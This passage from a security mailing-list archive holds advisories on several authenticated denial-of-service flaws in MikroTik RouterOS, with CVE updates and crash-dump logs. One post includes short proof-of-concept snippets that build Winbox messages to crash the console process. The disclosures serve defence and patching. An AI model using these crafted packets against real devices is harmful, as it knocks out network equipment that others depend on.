process suffers from a memory corruption vulnerability. By > sending a crafted packet, an authenticated remote user can crash the > resolver process due to invalid memory access. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.18-14:38:03.27@0: > 2020.06.18-14:38:03.27@0: > 2020.06.18-14:38:03.28@0: /nova/bin/resolver > 2020.06.18-14:38:03.28@0: --- signal=11 > > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206 > 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 > ebp=0x7fe5fd08 esp=0x7fe5fcc0 > 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 > ecx=0x77676f00 edx=0x0005 > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: maps: > 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00:0c 995 > /nova/bin/resolver > 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp 00:0c 950 > /lib/libubox.so > 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp 00:0c 946 > /lib/libumsg.so > 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp 00:0c 958 > /lib/ld-uClibc-0.9.33.2.so > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0 > 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc > e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08 > 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c > 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08 > 2020.06.18-14:38:03.28@0: > 2020.06.18-14:38:03.28@0: code: 0x80508f6 > 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 > 04 8b > > This vulnerability was initially found in long-term 6.44.6, and was fixed > in stable 6.47. > > 2. reachable assertion failure > The user process suffers from an assertion failure vulnerability. There is > a reachable assertion in the user process. By sending a crafted packet, an > authenticated remote user can crash the user process due to assertion > failure. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: /nova/bin/user > 2020.06.04-17:56:52.31@0: --- signal=6 > > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246 > 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 > ebp=0x7fee3790 esp=0x7fee3788 > 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 > ecx=0x00b4 edx=0x0006 > 2020.06.04-17:56:52.31@0: > 2020.06.04-17:56:52.31@0: maps: > 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00:0c 1002 > /nova/bin/user > 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.04-17:56:52.31@0: 7769-776ad000 r
Re: [FD] Three vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Three CVEs have been assigned to these vulnerabilities. CVE-2020-20266: Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/dot1x process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference). CVE-2020-20264: Mikrotik RouterOs before 6.47 (stable tree) in the /ram/pckg/advanced-tools/nova/bin/netwatch process. An authenticated remote attacker can cause a Denial of Service due to a divide by zero error. CVE-2020-20265: Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /ram/pckg/wireless/nova/bin/wireless process. An authenticated remote attacker can cause a Denial of Service due via a crafted packet. Q C 于2020年8月27日周四 下午7:16写道: > Advisory: three vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > 1. NULL pointer dereference > The dot1x process suffers from a memory corruption vulnerability. By > sending a crafted packet, an authenticated remote user can crash the dot1x > process due to NULL pointer dereference. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-14:51:29.47@0: > 2020.06.04-14:51:29.47@0: > 2020.06.04-14:51:29.81@0: /nova/bin/dot1x > 2020.06.04-14:51:29.81@0: --- signal=11 > > 2020.06.04-14:51:29.81@0: > 2020.06.04-14:51:29.81@0: eip=0x776a51e5 eflags=0x00010202 > 2020.06.04-14:51:29.81@0: edi=0x7fc51064 esi=0x08062ed0 > ebp=0x7fc50f78 esp=0x7fc50f6c > 2020.06.04-14:51:29.81@0: eax=0x ebx=0x776ad4ec > ecx=0x edx=0x08062e28 > 2020.06.04-14:51:29.81@0: > 2020.06.04-14:51:29.81@0: maps: > 2020.06.04-14:51:29.81@0: 08048000-0805f000 r-xp 00:0c 1064 > /nova/bin/dot1x > 2020.06.04-14:51:29.81@0: 7764a000-7767f000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-14:51:29.81@0: 77683000-7769d000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.04-14:51:29.81@0: 7769e000-776ad000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.04-14:51:29.81@0: 776ae000-776b4000 r-xp 00:0c 951 > /lib/liburadius.so > 2020.06.04-14:51:29.81@0: 776b5000-776bd000 r-xp 00:0c 950 > /lib/libubox.so > 2020.06.04-14:51:29.81@0: 776be000-776db000 r-xp 00:0c 947 > /lib/libucrypto.so > 2020.06.04-14:51:29.81@0: 776dc000-77728000 r-xp 00:0c 946 > /lib/libumsg.so > 2020.06.04-14:51:29.81@0: 7772e000-77735000 r-xp 00:0c 958 > /lib/ld-uClibc-0.9.33.2.so > 2020.06.04-14:51:29.81@0: > 2020.06.04-14:51:29.81@0: stack: 0x7fc52000 - 0x7fc50f6c > 2020.06.04-14:51:29.81@0: 00 00 00 00 90 27 06 08 e4 8a 72 77 a8 0f > c5 7f 2e be 6f 77 90 27 06 08 d0 2e 06 08 28 2e 06 08 > 2020.06.04-14:51:29.81@0: 28 2e 06 08 a4 0f c5 7f f0 da 6b 77 05 00 > 00 00 f0 da 6b 77 e0 2d 06 08 64 10 c5 7f e8 0f c5 7f > 2020.06.04-14:51:29.81@0: > 2020.06.04-14:51:29.81@0: code: 0x776a51e5 > 2020.06.04-14:51:29.81@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 > 08 e8 > > This vulnerability was initially found in stable 6.46.3, and was fixed in > stable 6.47. > > 2. division by zero > The netwatch process suffers from a division-by-zero vulnerability. By > sending a crafted packet, an authenticated remote user can crash the > netwatch process due to arithmetic exception. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-16:25:57.65@0: > 2020.06.04-16:25:57.65@0: > 2020.06.04-16:25:57.65@0: /ram/pckg/advanced-tools/nova/bin/netwatch > 2020.06.04-16:25:57.65@0: --- signal=8 > > 2020.06.04-16:25:57.65@0: > 2020.06.04-16:25:57.65@0: eip=0x0804c6d7 eflags=0x00010246 > 2020.06.04-16:25:57.65@0: edi=0x5ed9208c esi=0x > ebp=0x73f8 esp=0x73b0 > 2020.06.04-16:25:57.65@0: eax=0x ebx=0x08051020 > ecx=0x edx=0x > 2020.06.04-16:25:57.65@0: > 2020.06.04-16:25:57.65@0: maps: > 2020.06.04-16:25:57.65@0: 08048000-0804d000 r-xp 00:1a 14 > /ra
Re: [FD] Three vulnerabilities found in MikroTik's RouterOS
[update 2021/05/04] Three CVEs have been assigned to these vulnerabilities. CVE-2020-20215: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/diskd process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access. CVE-2020-20216: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/graphing process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference) CVE-2020-20213: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an stack exhaustion vulnerability in the /nova/bin/net process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU Q C 于2020年7月22日周三 下午8:11写道: > Advisory: three vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > 1. Memory corruption vulnerability > The diskd process suffers from a memory corruption vulnerability. By > sending a crafted packet, an authenticated remote user can crash the diskd > process due to invalid memory access. > > Against stable 6.44.3, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-14:18:22.55@0: > 2020.06.04-14:18:22.55@0: > 2020.06.04-14:18:22.55@0: /nova/bin/diskd > 2020.06.04-14:18:22.55@0: --- signal=11 > > 2020.06.04-14:18:22.55@0: > 2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202 > 2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790 > ebp=0x7fd40b78 esp=0x7fd40b6c > 2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec > ecx=0x776d54ec edx=0x20fe0010 > 2020.06.04-14:18:22.55@0: > 2020.06.04-14:18:22.55@0: maps: > 2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp 00:0c 1131 > /nova/bin/diskd > 2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp 00:0c 996 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp 00:0c 992 > /lib/libgcc_s.so.1 > 2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp 00:0c 976 > /lib/libuc++.so > 2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp 00:0c 982 > /lib/libubox.so > 2020.06.04-14:18:22.55@0: 776df000-7772b000 r-xp 00:0c 978 > /lib/libumsg.so > 2020.06.04-14:18:22.55@0: 77731000-77738000 r-xp 00:0c 990 > /lib/ld-uClibc-0.9.33.2.so > 2020.06.04-14:18:22.55@0: > 2020.06.04-14:18:22.55@0: stack: 0x7fd41000 - 0x7fd40b6c > 2020.06.04-14:18:22.55@0: ec 54 6d 77 1b 00 00 00 88 67 05 08 98 0b > d4 7f c6 c6 04 08 88 67 05 08 1b 00 00 00 10 00 fe 20 > 2020.06.04-14:18:22.55@0: 10 00 fe 20 ec 54 6d 77 f0 ea 6d 77 08 0c > d4 7f 6d a9 6d 77 88 67 05 08 1b 00 00 00 05 00 00 00 > 2020.06.04-14:18:22.55@0: > 2020.06.04-14:18:22.55@0: code: 0x776cd1db > 2020.06.04-14:18:22.55@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 > ff 75 > > This vulnerability was initially found in long-term 6.44.5, and has been > fixed in stable 6.47. > > 2. NULL pointer dereference vulnerability > The graphing process suffers from a memory corruption vulnerability. By > sending a crafted packet, an authenticated remote user can crash the > graphing process due to NULL > pointer dereference. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-15:12:41.47@0: > 2020.06.04-15:12:41.47@0: > 2020.06.04-15:12:41.47@0: /nova/bin/graphing > 2020.06.04-15:12:41.47@0: --- signal=11 > > 2020.06.04-15:12:41.47@0: > 2020.06.04-15:12:41.47@0: eip=0x080521e2 eflags=0x00010202 > 2020.06.04-15:12:41.47@0: edi=0x080610a0 esi=0x08061cb8 > ebp=0x7fa8acd8 esp=0x7fa8acb0 > 2020.06.04-15:12:41.47@0: eax=0x08061db8 ebx=0x7fa8ad0c > ecx=0x edx=0x08061ce8 > 2020.06.04-15:12:41.47@0: > 2020.06.04-15:12:41.47@0: maps: > 2020.06.04-15:12:41.47@0: 08048000-0805c000 r-xp 00:0c 1038 > /nova/bin/graphing > 2020.06.04-15:12:41.47@0: 77651000-77686000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-15:12:41.47@0: 7768a000-776a4000 r
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities. CVE-2020-20219: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/igmp-proxy process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference). CVE-2020-20262: Mikrotik RouterOs before 6.47 (stable tree) suffers from an assertion failure vulnerability in the /ram/pckg/security/nova/bin/ipsec process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet. Q C 于2020年8月13日周四 下午7:14写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > 1. NULL pointer dereference > The igmpproxy process suffers from a memory corruption vulnerability. By > sending a crafted packet, an authenticated remote user can crash the > igmpproxy process due to NULL pointer dereference. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy > 2020.06.04-17:44:27.12@0: --- signal=11 > > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206 > 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 > ebp=0x7fa932a8 esp=0x7fa9326c > 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x > ecx=0x000b edx=0x > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: maps: > 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp 00:13 16 > /ram/pckg/multicast/nova/bin/igmpproxy > 2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp 00:0c 944 > /lib/libuc++.so > 2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp 00:0c 950 > /lib/libubox.so > 2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp 00:0c 946 > /lib/libumsg.so > 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp 00:0c 958 > /lib/ld-uClibc-0.9.33.2.so > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c > 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 > a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f > 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 > a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f > 2020.06.04-17:44:27.12@0: > 2020.06.04-17:44:27.12@0: code: 0x8050a8d > 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 > 0c 0f > > This vulnerability was initially found in long-term 6.44.6, and was fixed > in stable 6.47. > > 2. reachable assertion failure > The ipsec process suffers from an assertion failure vulnerability. There > is a reachable assertion in the ipsec process. By sending a crafted packet, > an authenticated remote user can crash the ipsec process due to assertion > failure. > > Against stable 6.46.5, the poc resulted in the following crash dump. > > # cat /rw/logs/backtrace.log > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec > 2020.06.04-18:25:16.04@0: --- signal=6 > > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246 > 2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 > ebp=0x7f8fa450 esp=0x7f8fa448 > 2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 > ecx=0x0291 edx=0x0006 > 2020.06.04-18:25:16.04@0: > 2020.06.04-18:25:16.04@0: maps: > 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp 00:11 42 > /ram/pckg/security/nova/bin/ipsec > 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp 00:0c 964 > /lib/libuClibc-0.9.33.2.so > 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp 00:0c 960 > /lib/libgcc_s.so.1 > 2020.06.04-18:25:16.04@0: 774a7000
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities. CVE-2020-20221: Mikrotik RouterOs before 6.44.6 (long-term tree) suffers from an uncontrolled resource consumption vulnerability in the /nova/bin/cerm process. An authenticated remote attacker can cause a Denial of Service due to overloading the systems CPU. CVE-2020-20218: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/traceroute process. An authenticated remote attacker can cause a Denial of Service due via the loop counter variable. Q C 于2020年5月10日周日 上午10:41写道: > Advisory: two vulnerabilities found in MikroTik's RouterOS > > > Details > === > > Product: MikroTik's RouterOS > Affected Versions: until stable 6.45.7 (first vulnerability), until stable > 6.46.4 (second vulnerability) > Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second > vulnerability) > Vendor URL: https://mikrotik.com/ > Vendor Status: fixed version released > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > > Product Description > == > > RouterOS is the operating system used on the MikroTik's devices, such as > switch, router and access point. > > > Description of vulnerabilities > == > > These two vulnerabilities were tested only against the MikroTik RouterOS > stable release tree when found. Maybe other release trees also suffer from > these vulnerabilities. > > 1. The cerm process suffers from an uncontrolled resource consumption > issue. By sending a crafted packet, an authenticated remote user can cause > a high cpu load, which may make the device respond slowly or unable to > respond. > > 2. The traceroute process suffers from a memory corruption issue. By > sending a crafted packet, an authenticated remote user can crash the > traceroute process due to invalid memory access. > > > Solution > > > Upgrade to the corresponding latest RouterOS tree version. > > > References > == > > [1] https://mikrotik.com/download/changelogs/stable-release-tree > > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Two vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/04] CVE-2020-20212 and CVE-2020-20211 have been assigned to these two vulnerabilities. CVE-2020-20212: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference) CVE-2020-20211: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an assertion failure vulnerability in the /nova/bin/console process. An authenticated remote attacker can cause a Denial of Service due to an assertion failure via a crafted packet Q C 于2020年4月14日周二 下午6:29写道: > [Update 2020/04/14] The latest stable release tree 6.46.5 still suffers > from these two vulnerabilities. > > Details > === > > Product: MikroTik's RouterOS > Affected Versions: through 6.46.5 (stable release tree) > Fixed Versions: - > Vendor URL: https://mikrotik.com/ > Vendor Status: not fix yet > CVE: - > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team > > Poc > === > The following pocs are based on the tool routeros ( > https://github.com/tenable/routeros) > > 1) memory corruption in console process > > WinboxMessage msg; > msg.set_to(48, 4); > msg.set_command(0xfe0005); > msg.add_u32(0xfe000c, -1); > msg.add_u32(9, 9); > > 2) assertion failure in console process > > WinboxMessage msg; > msg.set_to(48, 4); > msg.set_command(0xfe0005); > msg.add_u32(0xfe0001, 0); > > Disclosure timeline > === > 2019/08/23reported the 2nd issue to the vendor > 2019/08/26reported the 1st issue to the vendor > 2019/08/28vendor reproduced the 1st issue and will fix it as soon as > possible > 2019/08/30vendor reproduced the 2nd issue and will fix it as soon as > possible > 2019/12/02notified the vendor the 1st issue still exists in version > 6.44.6 (2nd issue fixed) > 2020/01/06no response from the vendor, and did the initial disclosure > 2020/04/14re-tested these two issues against the stable 6.46.5, and > updated the disclosure > > > > Q C 于2020年1月6日周一 下午7:32写道: > >> Advisory: two vulnerabilities found in MikroTik's RouterOS >> >> >> Details >> === >> >> Product: MikroTik's RouterOS >> Affected Versions: before 6.44.6 (Long-term release tree) >> Fixed Versions: 6.44.6 (Long-term release tree) >> Vendor URL: https://mikrotik.com/ >> Vendor Status: fixed version released >> CVE: - >> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team >> >> >> Product Description >> == >> >> RouterOS is the operating system used on the MikroTik's devices, such as >> switch, router and access point. >> >> >> Description of vulnerabilities >> == >> >> These two vulnerabilities were tested only against the MikroTik RouterOS >> long-term release tree when found. Maybe other release trees also suffer >> from these issues. >> >> 1. The console process suffers from a memory corruption issue. >> An authenticated remote user can crash the console process due to a NULL >> pointer reference by sending a crafted packet. >> >> 2. The console process suffers from an assertion failure issue. There is >> a reachable assertion in the console process. An authenticated remote user >> can crash the console process duo to assertion failure by sending a crafted >> packet. >> >> Solution >> >> >> Upgrade to the corresponding latest RouterOS tree version. >> >> >> References >> == >> >> [1] https://mikrotik.com/download/changelogs/long-term-release-tree >> > ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == 1. memory corruption The resolver process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the resolver process due to invalid memory access. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.18-14:38:03.27@0: 2020.06.18-14:38:03.27@0: 2020.06.18-14:38:03.28@0: /nova/bin/resolver 2020.06.18-14:38:03.28@0: --- signal=11 2020.06.18-14:38:03.28@0: 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08 esp=0x7fe5fcc0 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 ecx=0x77676f00 edx=0x0005 2020.06.18-14:38:03.28@0: 2020.06.18-14:38:03.28@0: maps: 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp 00:0c 995 /nova/bin/resolver 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp 00:0c 950 /lib/libubox.so 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.18-14:38:03.28@0: 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08 2020.06.18-14:38:03.28@0: 2020.06.18-14:38:03.28@0: code: 0x80508f6 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04 8b This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47. 2. reachable assertion failure The user process suffers from an assertion failure vulnerability. There is a reachable assertion in the user process. By sending a crafted packet, an authenticated remote user can crash the user process due to assertion failure. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: /nova/bin/user 2020.06.04-17:56:52.31@0: --- signal=6 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790 esp=0x7fee3788 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4 edx=0x0006 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: maps: 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp 00:0c 1002 /nova/bin/user 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp 00:0c 947 /lib/libucrypto.so 2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp 00:0c 951 /lib/liburadius.so 2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp 00:0c 950 /lib/libubox.so 2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp 00:0c 948 /lib/libuxml++.so 2020.06.04-17:56:52.31@0: 776c2000-7770e000 r-xp 00:0c 946 /lib/libumsg.so 2020.06.04-17:56:52.31@0: 77714000-7771b000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: stack: 0x7fee4000 - 0x7fee3788 2020.06.04-17:56:52.31@0: 00 20 66 77 00 20 66 77 c8 37 ee 7f 77 60 65 77 06 00 00 00 00 22 66 77 20 00 00 00 00 00 00 00 2020.06.04-17:56:52.31@0: 15 00 00 00 28 38 ee 7f c4 37 ee 7f e4 ea 70 77 01 00 00 00 e4 ea 70 77 15 00 00 00 01 00 fe 00 2020.06.04-17:56:52.31@0: 2020.06.04-17:56:52.31@0: code: 0x7765a55b 2020.06.04-17:56:52.31@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8 This vulnerability was initially found in long-term 6.44.6, and was fixed in stable 6.47. Solution
[FD] Three vulnerabilities found in MikroTik's RouterOS
Advisory: three vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Vendor URL: https://mikrotik.com/ Vendor Status: fixed version released CVE: - Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Description of vulnerabilities == 1. NULL pointer dereference The dot1x process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the dot1x process due to NULL pointer dereference. Against stable 6.46.5, the poc resulted in the following crash dump. # cat /rw/logs/backtrace.log 2020.06.04-14:51:29.47@0: 2020.06.04-14:51:29.47@0: 2020.06.04-14:51:29.81@0: /nova/bin/dot1x 2020.06.04-14:51:29.81@0: --- signal=11 2020.06.04-14:51:29.81@0: 2020.06.04-14:51:29.81@0: eip=0x776a51e5 eflags=0x00010202 2020.06.04-14:51:29.81@0: edi=0x7fc51064 esi=0x08062ed0 ebp=0x7fc50f78 esp=0x7fc50f6c 2020.06.04-14:51:29.81@0: eax=0x ebx=0x776ad4ec ecx=0x edx=0x08062e28 2020.06.04-14:51:29.81@0: 2020.06.04-14:51:29.81@0: maps: 2020.06.04-14:51:29.81@0: 08048000-0805f000 r-xp 00:0c 1064 /nova/bin/dot1x 2020.06.04-14:51:29.81@0: 7764a000-7767f000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so 2020.06.04-14:51:29.81@0: 77683000-7769d000 r-xp 00:0c 960 /lib/libgcc_s.so.1 2020.06.04-14:51:29.81@0: 7769e000-776ad000 r-xp 00:0c 944 /lib/libuc++.so 2020.06.04-14:51:29.81@0: 776ae000-776b4000 r-xp 00:0c 951 /lib/liburadius.so 2020.06.04-14:51:29.81@0: 776b5000-776bd000 r-xp 00:0c 950 /lib/libubox.so 2020.06.04-14:51:29.81@0: 776be000-776db000 r-xp 00:0c 947 